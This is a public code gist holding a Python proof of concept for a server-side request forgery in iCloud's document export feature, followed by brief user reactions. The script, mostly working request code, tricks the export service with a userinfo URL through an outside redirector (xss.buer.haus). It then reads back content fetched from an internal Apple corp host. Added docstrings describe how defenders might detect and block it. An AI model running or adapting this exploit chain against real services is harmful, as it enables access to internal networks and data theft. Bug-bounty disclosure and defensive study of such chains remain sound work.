
@samwcyo

samwcyo/ssrf Secret

Created August 26, 2020 21:56
import requests, json
# Session material for the requests below; all three are blank in this copy.
# `cookies` is sent verbatim as the Cookie header of every request, while
# `clientId` and `dsId` are interpolated into query strings (dsId also into
# some URL paths and document ids).
cookies = ""
clientId = ""
dsId = ""
def firstStep(url):
    """Submit a store_document job for *url* and return its ``job_id``.

    The ``url`` form field is built as
    ``https://p37-mailws.icloud.com:443@<redirector>``. Under URL syntax
    everything before the ``@`` is userinfo, so the host a fetcher would
    actually contact is the redirector, not the icloud.com name at the front.

    Defensive takeaway: a server-side fetcher must validate the host returned
    by a real URL parser (and reject userinfo), and must re-apply that check
    on every redirect hop rather than only on the submitted string.
    """
    # redir.php presumably answers with a redirect to its `url` parameter;
    # that behaviour lives on the remote host and is not visible in this file.
    redirector = "xss.buer.haus/redir.php?url={}".format(url)
    endpoint = "https://p37-iworkexportws.icloud.com/iw/export-ws/10000033657/store_document?build=primary&clientId={}&dsid={}".format(clientId, dsId)
    form = {
        "url": "https://p37-mailws.icloud.com:443@{}".format(redirector),
        "source": "webmail",
        "build": "primary"
    }
    request_headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    response = requests.post(endpoint, data=form, headers=request_headers)
    return json.loads(response.text)["job_id"]
def secondStep():
    """Call the Pages ``lookup_by_id`` endpoint for ``documents``.

    The response is discarded and nothing is returned.
    """
    # NOTE(review): presumably mirrors the web client's request sequence;
    # the script never uses the result - confirm whether the call is needed.
    endpoint = "https://p37-docws.icloud.com/ws/com.apple.Pages/list/lookup_by_id?clientId={}&document_id=documents&dsid={}".format(clientId, dsId)
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    requests.get(endpoint, data={}, headers=request_headers)
def thirdStep():
    """Call the Pages ``list`` endpoint for the ``documents`` container.

    The response is discarded and nothing is returned.
    """
    endpoint = "https://p37-docws.icloud.com/ws/com.apple.Pages/list/list?clientId={}&concise=true&document_id=documents&dsid={}&fetch_manifests=false&skipErrors=true".format(clientId, dsId)
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    requests.get(endpoint, data={}, headers=request_headers)
def fourthStep(jobId):
    """POST once to ``store_document_status`` for *jobId*.

    The response is discarded and nothing is returned; ``sixthStep`` hits the
    same endpoint and is the call whose body is actually read.
    """
    endpoint = "https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId)
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    requests.post(endpoint, data={}, headers=request_headers)
def fifthStep(jobId):
    """POST to ``move_stored_document`` for the stored job *jobId*.

    The form names the result ``text_0%202.txt`` and places it under the
    ``documents`` parent in the ``com.apple.Pages`` zone. The response is
    discarded and nothing is returned.
    """
    endpoint = "https://p37-iworkexportws.icloud.com/iw/export-ws/{}/move_stored_document?build=primary&clientId={}&dsid={}".format(dsId, clientId, dsId)
    form = {
        "job_id": jobId,
        "name": "text_0%202.txt",
        "zone": "com.apple.Pages",
        "parent_id": "documents",
        "package": "N",
        "source": "webmail",
        "build": "primary"
    }
    request_headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    requests.post(endpoint, data=form, headers=request_headers)
def sixthStep(jobId):
    """POST to ``store_document_status`` for *jobId* and return the raw body.

    ``fetchURL`` calls this repeatedly and inspects the returned text, so the
    body is handed back undecoded.
    """
    endpoint = "https://p37-iworkexportws.icloud.com/iw/export-ws/{}/store_document_status?build=primary&clientId={}&dsid={}&job_id={}".format(dsId, clientId, dsId, jobId)
    request_headers = {
        "Content-Type": "text/plain",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    response = requests.post(endpoint, data={}, headers=request_headers)
    return response.text
def seventhStep(pageId):
    """POST to the Pages ``import`` endpoint for *pageId* and return the parsed JSON.

    The document is addressed as ``docws:<dsId>:com.apple.Pages:<pageId>``.
    ``eigthPage`` later reads ``bootstrap_source_id`` and
    ``bootstrap_source_token`` from the returned dict.
    """
    endpoint = "https://p37-iwmb.icloud.com/iwmb/pages/import?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId)
    payload = {
        "document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId),
        "language": "en-us",
        "locale": "en-us",
        "timezone": "US/Pacific"
    }
    # The body is JSON, but the explicit header labels it text/plain.
    request_headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    response = requests.post(endpoint, json=payload, headers=request_headers)
    return json.loads(response.text)
def eigthPage(data, pageId):
    """POST to the Pages ``create`` endpoint and return the parsed JSON.

    *data* is the dict returned by ``seventhStep``; its
    ``bootstrap_source_id`` and ``bootstrap_source_token`` are forwarded
    unchanged. *pageId* identifies the imported source document. The new item
    is named ``text_0 2.pages`` under the ``documents`` parent.
    """
    endpoint = "https://p37-iwmb.icloud.com/iwmb/pages/create?s=5816&clientId={}&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(clientId)
    payload = {
        "parent_item_id": "documents",
        "name": "text_0 2.pages",
        "bootstrap_source_id": data["bootstrap_source_id"],
        "bootstrap_source_token": data["bootstrap_source_token"],
        # Sent as the four-character string "null", not a JSON null.
        "delete_import_source_auth_token": "null",
        "import_source_document_id": "docws:{}:com.apple.Pages:{}".format(dsId, pageId),
        "is_import": True,
        "is_open_copy": False,
        "language": "en-us",
        "locale": "en-us",
        "timezone": "US/Pacific",
        "zone": "com.apple.Pages"
    }
    request_headers = {
        "Content-Type": "text/plain; charset=utf-8",
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    response = requests.post(endpoint, json=payload, headers=request_headers)
    return json.loads(response.text)
def ninthPage(data):
    """GET the manifest for ``data["item_id"]`` and return the parsed JSON.

    *data* is the dict returned by ``eigthPage``. ``finalPage`` later reads
    ``webservices.documentPath`` from the result.
    """
    endpoint = "https://iwmb.icloud.com/iwmb/pages/n{}/manifest?version=1010&clientType=G10.1&clientBuildNumber=10B146".format(data["item_id"])
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    response = requests.get(endpoint, headers=request_headers)
    return json.loads(response.text)
def finalPage(data):
    """GET ``fetchDocument`` for the manifest in *data* and return the body text.

    *data* is the manifest dict from ``ninthPage``; its
    ``webservices.documentPath`` value is spliced into the URL path directly
    in front of ``fetchDocument``.
    """
    document_path = data["webservices"]["documentPath"]
    endpoint = "https://p37-iwres.icloud.com/iwmb/{}fetchDocument?s=5816&version=1010&clientType=G10.1&clientBuildNumber=10B146".format(document_path)
    request_headers = {
        "Origin": "https://www.icloud.com",
        "Cookie": cookies
    }
    response = requests.get(endpoint, headers=request_headers)
    return response.text
def find_between(s, first, last):
    """Return the part of *s* between *first* and the next *last* after it.

    Only the first occurrence of *first* is considered. An empty string is
    returned when either marker cannot be found.
    """
    marker_at = s.find(first)
    if marker_at == -1:
        return ""
    begin = marker_at + len(first)
    finish = s.find(last, begin)
    if finish == -1:
        return ""
    return s[begin:finish]
def fetchURL(url):
    """Run the whole request sequence for *url* and return the document body.

    The server-side job submitted by ``firstStep`` is stored, moved into the
    Pages zone, imported as a new Pages document and finally read back, so
    the return value is whatever the service stored for *url*, UTF-8 encoded.

    Defender's view: the observable starting point is a ``store_document``
    request whose ``url`` field carries userinfo (an ``@``) in front of an
    external host - see ``firstStep``.
    """
    jobId = firstStep(url)
    secondStep()
    thirdStep()
    fourthStep(jobId)
    fifthStep(jobId)

    # Poll with no delay and no upper bound until the status body stops
    # mentioning "uploading".
    status = sixthStep(jobId)
    while "uploading" in status:
        status = sixthStep(jobId)
    pageId = json.loads(status)["result"]["document_id"]

    imported = seventhStep(pageId)
    created = eigthPage(imported, pageId)
    manifest = ninthPage(created)
    return finalPage(manifest).encode("utf8")
def clean(content):
    """Return what lies between ``<html>`` and the next ``</html>`` in *content*.

    Literal backslash-n sequences are turned into real newlines first. The
    result is an empty string when either tag is missing.
    """
    unescaped = content.replace("\\n", "\n")
    return find_between(unescaped, '<html>', '</html>')
# Address handed to the server-side fetcher. The author redacted the host and
# path; the `corp` label suggests an internal-only service, i.e. one that an
# internet-facing fetch feature should have refused to contact.
url = "http://redacted.corp.apple.com:1234/nexus/redacted"
# With a single argument the parenthesised form prints exactly what the
# Python 2 print statement printed.
print(clean(fetchURL(url)))
@Luigy-Lemon

cheese


ghost commented Oct 9, 2020

cheezy

@zer0yu

zer0yu commented Oct 12, 2020

cheesy

@spwn3r49sd3r00

Holy

@starlingvibes

Holy

@avipars

avipars commented Mar 14, 2021

ok

@rishi23root

🤯

@kurogai

kurogai commented Jun 7, 2023

cheese
